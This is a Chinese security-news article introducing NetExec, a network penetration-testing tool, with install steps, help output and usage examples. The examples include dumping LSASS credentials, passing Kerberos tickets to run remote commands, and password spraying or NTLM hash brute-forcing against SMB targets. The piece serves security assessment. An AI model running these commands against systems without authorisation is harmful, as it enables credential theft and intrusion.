freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

NetExec:一款功能强大的自动化网络安全评估与漏洞测试工具
2024-01-12 09:24:38

关于NetExec

NetExec是一款功能强大的自动化网络安全评估与漏洞测试工具,该工具可以帮助广大研究人员以自动化的形式测试大型网络的安全,并通过利用网络服务漏洞来评估目标网络的安全态势。

支持的协议

1、SMB协议

2、LDAP协议

3、WinRM协议

4、MSSQL协议

5、SSH协议

6、FTP协议

7、RDP协议

8、WMI协议

工具安装

Unix安装

广大研究人员可以使用pipx系统全局安装:

apt install pipx git

pipx ensurepath

pipx install git+https://github.com/Pennyw0rth/NetExec

然后直接运行即可:

NetExec

nxcdb

我们还可以使用Poetry来安装:

apt-get install -y libssl-dev libffi-dev python-dev-is-python3 build-essential

git clone https://github.com/Pennyw0rth/NetExec

cd NetExec

poetry install

poetry run NetExec

或者使用pip安装:

apt install python3 python3-pip

git clone https://github.com/Pennyw0rth/NetExec

cd NetExec

python3 -m venv .

source bin/activate

pip install .

NetExec

Windows安装

如果你是Windows用户的话,可以直接访问该项目的【Releases页面】下载最新版本的NetExec预编译版本,解压后直接在命令行窗口中运行即可使用。

工具使用

工具命令参数

#~ nxc --help

usage: nxc [-h] [-t THREADS] [--timeout TIMEOUT] [--jitter INTERVAL] [--no-progress] [--verbose] [--debug] [--version] {smb,ssh,ldap,ftp,wmi,winrm,rdp,vnc,mssql} ...

 

    <-- Banner -->   

 

options:

  -h, --help               显示工具帮助信息和退出

  -t THREADS            设置并行线程数量(默认:100)

  --timeout TIMEOUT     设置每个线程的超时时间(默认:None)

  --jitter INTERVAL       设置每次连接的随机时间间隔(默认:None)

  --no-progress          在扫描过程中不显示进度条

  --verbose              启用Verbose模式

  --debug               启用调试模式

  --version              显示工具版本信息

 

protocols:

  available protocols

 

  {smb,ssh,ldap,ftp,wmi,winrm,rdp,vnc,mssql}

    smb                 使用SMB协议

    ssh                 使用SSH协议

    ldap                使用LDAP协议

    ftp                 使用FTP协议

    wmi                 使用WMI协议

    winrm               使用WINRM协议

    rdp                 使用RDP协议

    vnc                 使用VNC协议

    mssql               使用MSSQL协议

模块使用

查看可用模块:

nxc smb -L

使用一个模块:

nxc smb <target(s)> -u Administrator -p 'October2022' -M lsassy

查看模块选项:

nxc smb -M lsassy --options

使用模块选项:

nxc <protocol> <target(s)> -u Administrator -p 'P@ssw0rd' -M lsassy -o COMMAND=xxxxxxxxug'

Kerberos使用

$ sudo nxc smb zoro.gold.local -k -u bonclay -p Ocotober2022

SMB         zoro.gold.local 445    ZORO             [*] Windows 10.0 Build 14393 (name:ZORO) (domain:gold.local) (signing:False) (SMBv1:False)

SMB         zoro.gold.local 445    ZORO             [+] gold.local\bonclay

或使用--use-kcache:

$ export KRB5CCNAME=/home/bonclay/impacket/administrator.ccache

$ nxc smb zoro.gold.local --use-kcache

SMB         zoro.gold.local 445    ZORO             [*] Windows 10.0 Build 14393 (name:ZORO) (domain:gold.local) (signing:False) (SMBv1:False)

SMB         zoro.gold.local 445    ZORO             [+] gold.local\administrator (Pwn3d!)

$ sudo nxc smb zoro.gold.local --use-kcache -x whoami

SMB         zoro.gold.local 445    ZORO             [*] Windows 10.0 Build 14393 (name:ZORO) (domain:gold.local) (signing:False) (SMBv1:False)

SMB         zoro.gold.local 445    ZORO             [+] gold.local\administrator (Pwn3d!)

SMB         zoro.gold.local 445    ZORO             [+] Executed command

SMB         zoro.gold.local 445    ZORO             gold\administrator

 

$ export KRB5CCNAME=/home/bonclay/impacket/bonclay.ccache

$ sudo nxc smb zoro.gold.local --use-kcache -x whoami

SMB         zoro.gold.local 445    ZORO             [*] Windows 10.0 Build 14393 (name:ZORO) (domain:gold.local) (signing:False) (SMBv1:False)

SMB         zoro.gold.local 445    ZORO             [+] gold.local\bonclay

爆破&密码喷射

netexec <protocol> <target(s)> -u username1 -p password1 password2

netexec <protocol> <target(s)> -u username1 username2 -p password1

netexec <protocol> <target(s)> -u ~/file_containing_usernames -p ~/file_containing_passwords

netexec <protocol> <target(s)> -u ~/file_containing_usernames -H ~/file_containing_ntlm_hashes

netexec <protocol> <target(s)> -u ~/file_containing_usernames -H ~/file_containing_ntlm_hashes --no-bruteforce

netexec <protocol> <target(s)> -u ~/file_containing_usernames -p ~/file_containing_passwords --no-bruteforce

许可证协议

本项目的开发与发布遵循BSD-2-Clause开源许可证协议。

项目地址

NetExec:【GitHub传送门

参考资料

https://netexec.wiki/

# 网络安全 # 安全评估 # 漏洞扫描 # 协议安全 # 网络扫描
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录